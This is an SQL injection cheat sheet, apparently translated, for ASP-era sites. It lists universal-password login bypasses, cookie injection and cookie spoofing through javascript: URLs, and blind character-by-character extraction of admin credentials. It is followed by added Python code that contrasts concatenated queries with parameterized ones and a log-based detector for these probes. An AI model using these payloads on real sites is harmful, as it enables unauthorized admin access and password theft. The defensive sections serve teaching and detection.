Alternative login injection form:
A common kind of check (present in ASP, PHP and JSP alike) first tests whether the user exists, for example in ASP: "select password from admin where user_name='"&request("user_name")&"'"; only then is the MD5 of the submitted password compared with the stored value. A guessing strategy can be built on the first query: user_name: xxx' and password>'a. If the first character of password is greater than a, continue with user_name: xxx' and password>'b.
select * from admin where username='admin' and password='' injection method:
Universal username: xxx' union select * from users/*
select * from admin where username=admin and password=pass injection method:
Account: 777  Password: 999 union select * from admin;
Universal passwords:
Username: admin'or'1'='1  Password: 'or'2'='2  username: ' or 1=1 or ''='  passwd: anything  'or'='or' 'or''=' 'or 1=1 "or"=" 'or 1=1/* php "or "a"="a "or 1=1-- "or"=" "or"="a'='a "or1=1-- "or=or" ''or'='or' ') or ('a'='a '.).or.('.a.'='.a 'or 1=1 'or 1=1-- 'or 1=1/* 'or"="a'='a 'or' '1'='1' 'or''=' 'or''=''or''=' !!!!! 'or'='1' 'or'='or' 'or.'a.'='a 'or1=1-- 1'or'1'='1 a'or' 1=1-- a'or'1=1-- or 'a'='a' or 1=1-- or1=1--
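The queries above are the page's own ASP forms. What follows is an added Python demonstration, not code from the original page: it rebuilds each concatenated query against a constructed in-memory SQLite table and places a parameterized version beside them, so the effect of the universal username, the universal password, the unquoted union and the two-step password oracle can be checked directly against the fix. The table contents, the sample password "s3cret" and all function names are assumptions.

```python
import hmac
import sqlite3


def make_db():
    # Constructed stand-in for the page's "admin" table. Plaintext storage
    # only mirrors the page's queries; a real system stores a salted, slow
    # hash (bcrypt/argon2) and compares against that verifier.
    db = sqlite3.connect(":memory:")
    db.execute("create table admin (username text, password text)")
    db.execute("insert into admin values (?, ?)", ("admin", "s3cret"))
    db.commit()
    return db


def login_concat_quoted(db, username, password):
    # Quoted string concatenation: the page's
    # select * from admin where username='admin' and password='' form.
    # A quote in either value closes the literal and the rest becomes SQL.
    sql = ("select * from admin where username='" + username
           + "' and password='" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_concat_unquoted(db, username, password):
    # Unquoted concatenation: the page's username=admin and password=pass
    # form. Numeric-looking input needs no quote at all to append a UNION.
    sql = ("select * from admin where username=" + username
           + " and password=" + password)
    return db.execute(sql).fetchone() is not None


def user_exists_concat(db, username):
    # The page's two-step check: look the user up by name first, compare
    # the password hash afterwards. The password never reaches this query,
    # yet the unescaped username turns it into a yes/no oracle on the
    # password column (xxx' and password>'a).
    sql = "select password from admin where username='" + username + "'"
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    # Placeholders keep user input as data: quotes, or/union and comment
    # markers have no syntactic effect. The stored verifier is fetched and
    # compared in constant time outside SQL, so no comparison oracle exists.
    row = db.execute("select password from admin where username=?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0].encode(), password.encode())


if __name__ == "__main__":
    db = make_db()
    print("concat, universal password:",
          login_concat_quoted(db, "admin'or'1'='1", "'or'2'='2"))
    print("concat, unquoted union:",
          login_concat_unquoted(db, "777", "999 union select * from admin"))
    print("concat, oracle password>'a':",
          user_exists_concat(db, "admin' and password>'a"))
    print("safe, universal password:",
          login_safe(db, "admin'or'1'='1", "'or'2'='2"))
    print("safe, real credentials:", login_safe(db, "admin", "s3cret"))
```

The oracle in user_exists_concat only answers for a username that really exists, which is why the page's placeholder xxx has to be a valid account name; the parameterized lookup returns no row for the modified name and leaks nothing.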
Cookie injection:
http://xxxx/view.asp?id=23 First visit http://xxxx/view.asp?id=23, then enter in the browser: javascript:alert(document.cookie="id="+escape("23 and 1=1")) and visit http://xxxx/view.asp again (no error). Then enter: javascript:alert(document.cookie="id="+escape("23 and 1=2")) and visit http://xxxx/view.asp again (error). If the page errors at this step, cookie injection is possible.
Cookie spoofing
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
Then replace login.asp in the URL with admin_index.asp
Search-type injection
For example:
Test for injection:
1%' and 1=1 and '%' ='
1%' and 1=2 and '%' ='
Test whether the table exists:
1%'and(select count(*)from admin)>0 and '%'='
Test whether the columns exist:
1%'and(select top 1 len(username)from admin) and '%'='
1%'and(select top 1 len(password)from admin) and '%'='
Guess the range of the column contents:
1%'and(select top 1 asc(mid(username,1,1))from admin)>102 and '%'='
1%'and(select top 1 asc(mid(username,1,1))from admin)>40 and '%'='
1%'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'='
1%'and(select top 1 asc(mid(username,2,1))from admin)=100 and '%'='
1%'and(select top 1 asc(mid(username,3,1))from admin)=109 and '%'='
1%'and(select top 1 asc(mid(username,4,1))from admin)=105 and '%'='
1%'and(select top 1 asc(mid(username,5,1))from admin)=110 and '%'='
1%'and(select top 1 asc(mid(password,1,1))from admin)=49 and '%'='
1%'and(select top 1 asc(mid(password,2,1))from admin)=52 and '%'='
1%'and(select top 1 asc(mid(password,3,1))from admin)=50 and '%'='
1%'and(select top 1 asc(mid(password,4,1))from admin)=49 and '%'='
1%'and(select top 1 asc(mid(password,5,1))from admin)=53 and '%'='
1%'and(select top 1 asc(mid(password,6,1))from admin)=68 and '%'='
1%'and(select top 1 asc(mid(password,7,1))from admin)=51 and '%'='
1%'and(select top 1 asc(mid(password,8,1))from admin)=49 and '%'='
1%'and(select top 1 asc(mid(password,9,1))from admin)=50 and '%'='
1%'and(select top 1 asc(mid(password,10,1))from admin)=49 and '%'='
1%'and(select top 1 asc(mid(password,11,1))from admin)=57 and '%'='
1%'and(select top 1 asc(mid(password,12,1))from admin)=52 and '%'='
1%'and(select top 1 asc(mid(password,13,1))from admin)=43 and '%'='
1%'and(select top 1 asc(mid(password,14,1))from admin)=51 and '%'='
1%'and(select top 1 asc(mid(password,15,1))from admin)=68 and '%'='
1%'and(select top 1 asc(mid(password,16,1))from admin)=51 and '%'='
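The cookie injection, cookie spoofing and search-type probes above all leave a recognisable trail in server logs: a request pair that differs only by "and 1=1" versus "and 1=2", a run of asc(mid(...)) comparisons against the same path, or a quote-or string arriving in a cookie rather than a form field. The following is an added Python detector, not part of the original page, that runs over constructed log lines and raises one alert per technique. It assumes a combined-style log format extended with the request's Cookie header as the last quoted field; stock formats never record cookies, which is exactly why cookie injection tends to go unnoticed. The sample lines, addresses and pattern names are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed log lines (not from any real server). Last quoted field is
# the Cookie header, "-" when absent (assumed custom log format).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /view.asp?id=23 HTTP/1.1" 200 512 "-"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /view.asp HTTP/1.1" 200 512 "id=23%20and%201%3D1"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /view.asp HTTP/1.1" 500 231 "id=23%20and%201%3D2"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /admin_index.asp HTTP/1.1" 200 1024 "adminuser=%27or%27%3D%27or%27; adminpass=%27or%27%3D%27or%27; admindj=1"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /search.asp?key=1%25%27and%28select%20top%201%20asc%28mid%28username%2C1%2C1%29%29from%20admin%29%3E102%20and%20%27%25%27%3D%27 HTTP/1.1" 200 800 "-"
10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /search.asp?key=1%25%27and%28select%20top%201%20asc%28mid%28username%2C1%2C1%29%29from%20admin%29%3D97%20and%20%27%25%27%3D%27 HTTP/1.1" 200 800 "-"
10.0.0.9 - - [01/Jan/2024:10:01:04 +0000] "GET /search.asp?key=1%25%27and%28select%20top%201%20asc%28mid%28username%2C2%2C1%29%29from%20admin%29%3D100%20and%20%27%25%27%3D%27 HTTP/1.1" 200 800 "-"
10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "GET /search.asp?key=laptop HTTP/1.1" 200 800 "-"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"$')

# Signatures for the three techniques described on the page.
BOOL_PROBE = re.compile(r"\band\s+1\s*=\s*([12])\b", re.I)
CHAR_EXTRACT = re.compile(r"asc\s*\(\s*mid\s*\(", re.I)
QUOTE_OR = re.compile(r"'\s*or\s*'", re.I)


def decoded_inputs(line):
    """Return (ip, path, status, [(source, value), ...]) with every query
    and cookie value percent-decoded, or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _ts, _method, target, status, cookie = m.groups()
    url = urlsplit(target)
    values = [("query", v) for _, v in parse_qsl(url.query, keep_blank_values=True)]
    if cookie != "-":
        # Cookies are "name=value; name=value"; decode each pair separately.
        for part in cookie.split(";"):
            values += [("cookie", v) for _, v in
                       parse_qsl(part.strip(), keep_blank_values=True)]
    return ip, url.path, int(status), values


def analyze(log_text):
    """Group decoded inputs by (client, path) and raise one alert per
    technique: a true/false probe pair, repeated asc(mid()) extraction, or a
    quote-or login-bypass string in a query parameter or cookie."""
    state = defaultdict(lambda: {"probes": set(), "extract": 0, "bypass": set()})
    for line in log_text.splitlines():
        parsed = decoded_inputs(line)
        if parsed is None:
            continue
        ip, path, _status, values = parsed
        rec = state[(ip, path)]
        for source, value in values:
            m = BOOL_PROBE.search(value)
            if m:
                rec["probes"].add(m.group(1))   # "1" or "2"
            if CHAR_EXTRACT.search(value):
                rec["extract"] += 1
            if QUOTE_OR.search(value):
                rec["bypass"].add(source)
    alerts = []
    for (ip, path), rec in sorted(state.items()):
        if {"1", "2"} <= rec["probes"]:
            alerts.append((ip, path, "boolean-blind true/false probe pair"))
        if rec["extract"] >= 2:
            alerts.append((ip, path, "character-by-character extraction"))
        for source in sorted(rec["bypass"]):
            alerts.append((ip, path, "login-bypass payload in " + source))
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Matching is done on the decoded values rather than the raw URL so that %27 and %20 variants are caught the same way, and cookie values are treated as untrusted input exactly like query parameters; the same rule applies to the fix, where every value from request(...) or the cookie collection goes through a parameterized query and admin state comes from a server-side session rather than an admindj cookie.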